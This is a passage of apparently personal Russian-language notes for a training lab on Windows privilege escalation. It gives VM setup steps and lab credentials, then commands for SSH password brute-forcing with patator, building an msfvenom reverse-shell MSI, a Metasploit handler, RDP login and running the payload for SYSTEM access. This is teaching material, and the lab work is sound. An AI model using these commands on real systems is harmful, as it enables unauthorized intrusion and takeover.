***************************** 13  Privilege Escalation *****************************************
Подготовка

Требования к лабораторному стенду:

    На вашей операционной системе должно быть установлено программное обеспечение VirtualBox.
    Поддерживаемые ОС: Linux,Windows, MacOS (x64). MacOS с архитектурой arm (m1/m2/…) не поддерживаются.
     

Для подготовки стенда:

Необходимо скачать архив по ссылке: Win10.rar (Зеркало: Win10.rar Яндекс.Диск)
https://disk.yandex.ru/d/5t8DvakEysTYKw
https://cybered-my.sharepoint.com/personal/v_karmanov_cyber-ed_ru/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fv%5Fkarmanov%5Fcyber%2Ded%5Fru%2FDocuments%2F%D0%9F%D1%80%D0%BE%D1%84%D0%B5%D1%81%D1%81%D0%B8%D1%8F%20%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%2E%20%D0%9F%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D0%BA%D0%B0%2F12%20%D0%9F%D0%BE%D0%B2%D1%8B%D1%88%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BF%D1%80%D0%B8%D0%B2%D0%B8%D0%BB%D0%B5%D0%B3%D0%B8%D0%B9%20%D0%BD%D0%B0%20%D1%83%D0%B7%D0%BB%D0%B0%D1%85%20%D0%BB%D0%BE%D0%BA%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE%D0%B9%20%D1%81%D0%B5%D1%82%D0%B8%20%28%D0%B2%20%D0%9E%D0%A1%20Windows%29%2FWin10%2Erar&parent=%2Fpersonal%2Fv%5Fkarmanov%5Fcyber%2Ded%5Fru%2FDocuments%2F%D0%9F%D1%80%D0%BE%D1%84%D0%B5%D1%81%D1%81%D0%B8%D1%8F%20%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%2E%20%D0%9F%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D0%BA%D0%B0%2F12%20%D0%9F%D0%BE%D0%B2%D1%8B%D1%88%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BF%D1%80%D0%B8%D0%B2%D0%B8%D0%BB%D0%B5%D0%B3%D0%B8%D0%B9%20%D0%BD%D0%B0%20%D1%83%D0%B7%D0%BB%D0%B0%D1%85%20%D0%BB%D0%BE%D0%BA%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE%D0%B9%20%D1%81%D0%B5%D1%82%D0%B8%20%28%D0%B2%20%D0%9E%D0%A1%20Windows%29&ga=1

Распаковать данный архив и перейти в появившуюся директорию Win10. Далее импортировать виртуальную машину Windows10 двойным нажатием на файл  Win10.vbox.

После запуска машины, чтобы она инициализировала сеть необходимо войти в нее под специальным аккаунтом: 

    Логин: helpdesk
    Пароль: Qwerty123


Возможные проблемы:

1. Так как виртуальная машина была экспортирована с другого компьютера, в ее настройках осталось указание ранее использованного интерфейса для беспроводной сети. В связи с этим может произойти ошибка:

 …the following physical network interfaces were not found: Intel(R) Wi-Fi 6E…

Если данная ошибка появилась, то просто измените адаптер сети на используемый вами в настройках машины. В предложенном окне ошибки, может появиться кнопка Change Network Settings. Нажмите на нее и поменяйте имея адаптера на ваш в открывшемся окне настроек сети машины.

2. Так как данный виртуальный стенд является виртуальной машиной на основе Windows 10 ОС, операционная система Windows может испытывать трудности с получением сетевого адреса в вашей локальной сети. Убедитесь что в настройках виртуальной машины вы используете опцию “Bridged Adapter”, чтобы ваша виртуальная машина получила адрес в вашей физической сети.

3. Чтобы машина Windows получила IP адрес в сети, необходимо после запуска машины зайти в нее под каким либо пользователем. Для каждой машины вам предоставлен пользователь для входа в нее, с целью инициализации сети. В данной виртуальной машине вам нужно использовать аккаунт:

    Логин: helpdesk
    Пароль: Qwerty123


***********************************************************************************************************************************
ssh_login john password butterfly1

# 0 - указать путь до файла. Если он в этой директории, то ничего не надо, только имя файла
patator ssh_login host=192.168.56.103 user=john password=FILE0 0=/usr/share/wordlists/rockyou.txt -x ignore:mesg='Authentication failed.'

butterfly1

5. Передадим файл на удаленную машину по SSH с помощью scp и запустим файл:

$ scp winPEASx64.exe john@10.8.0.14:C:\\Users\\John\\

# интересно
C:\Users\john\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt

# готовим обратный шел (shell) с нагрузкой (payload) windows/x64/shell_reverse_tcp
# -o указать путь и имя файла
─$ msfvenom -platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.56.100 LPORT=4444 -f msi -o rev.msi


# подготовка metasploit framework
# msf6 > search multi/handler
#  5  exploit/multi/handler                                                 manual     No     Generic Payload Handler
msf6 exploit(multi/handler) > 
# options : set lhost 192.168.56.100 (наш ip)
# msf6 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
# windows/x64/shell_reverse_tcp - указано при создании нагрузки с помощью msfvenom
run

# данный вариант подходит если мы не можем запустить через командную строку нашу нагруззку
12. Подключимся к удаленной системе по RDP, используя xfreerdp – свободный RDP-клиент с консольным интерфейсом, укажем пользователя, пароль, хост и удобную нам ширину экрана:

$ xfreerdp /u:john /p:butterfly1 /w:768 /v:192.168.56.103
# перед запуском запустит msf6 exploit(multi/handler) >run
запуск в ручную rev.msi

готово. доступ к cmd с правами system
# вывод содержания файла в cmd  type file.txt
type root.txt









